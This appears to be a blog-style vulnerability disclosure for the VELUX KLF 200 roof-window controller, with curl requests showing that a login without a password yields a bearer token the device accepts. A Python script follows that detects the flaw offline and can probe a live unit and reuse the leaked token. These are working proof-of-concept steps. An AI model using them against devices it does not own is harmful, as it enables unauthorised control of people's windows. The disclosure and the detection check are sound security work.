Another episode of Internet of Things done wrong. This exploit is so trivial, I would not even call it an exploit.
VELUX[0] is the leading manufacturer of roof windows (they are really great!). The VELUX KLF 200 is a device to control VELUX windows over ethernet/internet[1]. The KLF 200 has an undocumented HTTP API for executing scenes, in other words for opening and closing VELUX windows. Requests go to /api/v1/<resource> as JSON POST bodies, and the device prefixes every JSON response with the string )]}', which the client has to strip before parsing.
Expected behaviour with the correct password (a token is issued and result is true):
* julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/auth' -X POST -d '{"action":"login","params":{"password":"velux123"}}'
)]}',
{"token":"6XmONGhWRF5Wcu4XrTHZLA==","result":true,"deviceStatus":"IDLE","data":{},"errors":[]}
Expected behaviour with a wrong password (no token, result is false, error 401):
* julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/auth' -X POST -d '{"action":"login","params":{"password":"fnord"}}'
)]}',
{"result":false,"deviceStatus":"IDLE","data":{},"errors":[401]}
Login without supplying a password at all (no params object in the request):
* julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/auth' -X POST -d '{"action":"login"}'
)]}',
{"token":"6XmONGhWRF5Wcu4XrTHZLA==","result":false,"deviceStatus":"IDLE","data":{},"errors":[999]}
... result is false and error 999 is reported, but the response still carries a token. Note that it is the same token string the device issued after the correct login above. The device accepts that token as a valid bearer token on other endpoints:
* julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/products' -H 'Authorization: Bearer 6XmONGhWRF5Wcu4XrTHZLA==' -X POST -d '{"action":"get"}'
)]}',
{"token":"6XmONGhWRF5Wcu4XrTHZLA==","result":true,"deviceStatus":"IDLE","data":[...],"errors":[]}
I assume this is not expected behaviour.
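The exchange above, as an added check script that is not part of the original post. It strips the )]}', prefix, parses the login response, and flags the bug: a login the device itself reports as failed (result false) that nevertheless carries a token. The helper names (parse_klf_response, token_issued_without_password, api_call, probe) and the host/password placeholders are assumptions of this example, not API names from the device. The sample bodies in SAMPLE_RESPONSES are constructed to mirror the three curl responses shown above, so the checks run offline; probe() performs the live request sequence against a device you own.

```python
"""Check a VELUX KLF 200 for the password-less login token described above.

Added example; helper names and placeholder values are this script's own,
not documented KLF 200 API names.
"""
import json
import sys
import urllib.request
from typing import Optional

# Anti-JSON-hijacking prefix the device prepends to every response body.
JSON_PREFIX = ")]}',"


def parse_klf_response(raw: str) -> dict:
    """Strip the )]}', prefix (and any leading whitespace) and parse the JSON object."""
    body = raw.lstrip()
    if body.startswith(JSON_PREFIX):
        body = body[len(JSON_PREFIX):]
    return json.loads(body)


def token_issued_without_password(login_body: dict) -> bool:
    """True when the device reports a failed login (result false) yet still hands out a token."""
    return (not login_body.get("result", False)) and bool(login_body.get("token"))


def api_call(host: str, path: str, payload: dict,
             token: Optional[str] = None, timeout: float = 5.0) -> dict:
    """POST a JSON action to http://<host>/api/v1/<path>, optionally with a Bearer token."""
    req = urllib.request.Request(
        "http://%s/api/v1/%s" % (host, path),
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    if token:
        req.add_header("Authorization", "Bearer " + token)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return parse_klf_response(resp.read().decode())


def probe(host: str) -> dict:
    """Live check: log in with no password, then try the returned token on /products."""
    login = api_call(host, "auth", {"action": "login"})
    leaked = token_issued_without_password(login)
    accepted = False
    if leaked:
        products = api_call(host, "products", {"action": "get"}, token=login["token"])
        accepted = bool(products.get("result"))
    return {"token_without_password": leaked, "token_accepted": accepted}


# Constructed sample bodies mirroring the curl responses shown in the post.
SAMPLE_RESPONSES = {
    "correct_password": ')]}\',\n{"token":"6XmONGhWRF5Wcu4XrTHZLA==","result":true,"deviceStatus":"IDLE","data":{},"errors":[]}',
    "wrong_password": ')]}\',\n{"result":false,"deviceStatus":"IDLE","data":{},"errors":[401]}',
    "no_password": ')]}\',\n{"token":"6XmONGhWRF5Wcu4XrTHZLA==","result":false,"deviceStatus":"IDLE","data":{},"errors":[999]}',
}


def offline_verdicts() -> dict:
    """Run the token-leak check over the constructed samples; only no_password should trip it."""
    return {name: token_issued_without_password(parse_klf_response(raw))
            for name, raw in SAMPLE_RESPONSES.items()}


if __name__ == "__main__":
    # Offline: python klf200_check.py          Live: python klf200_check.py 192.168.2.127
    if len(sys.argv) > 1:
        print(probe(sys.argv[1]))
    else:
        print(offline_verdicts())
```

The live probe only needs network access to the device's HTTP port; if token_accepted comes back true, the unit is affected and should be kept off any network you do not fully trust until the firmware is fixed.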
Current (tested) firmware version: 0.1.1.0.41.0
[0] http://www.velux.com/
[1] http://velcdn.azureedge.net/~/media/marketing/de/dokumente/pdf/produktanleitungen/produktdatenblatt/integra/velux-produktdatenblatt-integra-interface-klf200.pdf?la=de-de